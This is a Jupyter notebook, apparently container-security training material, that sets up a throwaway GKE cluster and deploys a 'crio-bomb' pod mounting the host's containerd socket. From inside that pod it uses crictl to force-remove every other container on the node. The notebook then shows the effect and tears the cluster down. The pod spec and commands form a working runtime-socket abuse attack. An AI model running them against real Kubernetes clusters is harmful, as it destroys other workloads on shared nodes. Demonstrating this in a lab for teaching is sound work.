**This notebook covered by the following [license](License.ipynb)  This note must not be removed**

In [1]:
REGION=europe-west4
ZONE=$REGION-b
PROJECT=gca-training-0

In [2]:
gcloud beta container \
  --project "$PROJECT" \
  clusters create "spooky" \
  --zone "$ZONE" \
  --no-enable-basic-auth \
  --cluster-version "1.18.9-gke.2501" \
  --release-channel "rapid" \
  --machine-type "e2-medium" \
  --image-type "COS_CONTAINERD" \
  --disk-type "pd-standard" \
  --disk-size "100" \
  --metadata disable-legacy-endpoints='true' \
  --scopes "https://www.googleapis.com/auth/cloud-platform" \
  --num-nodes "3" \
  --enable-stackdriver-kubernetes \
  --enable-ip-alias \
  --network "projects/$PROJECT/global/networks/default" \
  --subnetwork "projects/$PROJECT/regions/$REGION/subnetworks/default" \
  --default-max-pods-per-node "110" \
  --no-enable-master-authorized-networks \
  --addons HorizontalPodAutoscaling,HttpLoadBalancing \
  --enable-autoupgrade \
  --enable-autorepair  \
  --max-surge-upgrade 1 \
  --max-unavailable-upgrade 0 \
  --enable-shielded-nodes

ERROR: (gcloud.beta.container.clusters.create) ResponseError: code=400, message=Failed precondition when calling the ServiceConsumerManager: tenantmanager::185014: Consumer 406877729788 should enable service:container.googleapis.com before generating a service account.


: 1

In [ ]:
cd ~/import/container-security/critcl

In [ ]:
gcloud builds submit --tag gcr.io/$PROJECT/crio-bomb

In [ ]:
kubectl create -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
 name: crio-bomb
spec:
 containers:
 - image: gcr.io/$PROJECT/crio-bomb
   name: crio-bomb
   volumeMounts:
   - mountPath: /run/containerd
     name: run-containerd
 volumes:
 - name:  run-containerd
   hostPath: 
     path: /run/containerd
EOF

In [ ]:
kubectl get pods 

In [ ]:
kubectl exec crio-bomb -- ls -alFtr /run/containerd

In [ ]:
kubectl logs crio-bomb

In [ ]:
kubectl exec crio-bomb -- crictl ps 

In [ ]:
DEAD=$(kubectl exec crio-bomb -- crictl ps | awk  '!/(POD|crio-bomb)/{print $1}')
echo $DEAD

In [ ]:
kubectl exec crio-bomb -- crictl rm --force $DEAD

In [ ]:
kubectl get pods -A

In [ ]:
kubectl delete pod crio-bomb

In [ ]:
gcloud beta container clusters list 

In [ ]:
gcloud beta compute instances list 

In [ ]:
NODE=$(gcloud beta compute instances list | tail -1 | cut -f1 -d" ")
echo $NODE

In [ ]:
gcloud beta compute \
 ssh --zone "$ZONE" "$NODE" \
 --project "$PROJECT" -- \
sudo ls -alsFtr /run/containerd

In [ ]:
gcloud --quiet beta container clusters delete spooky --zone $ZONE 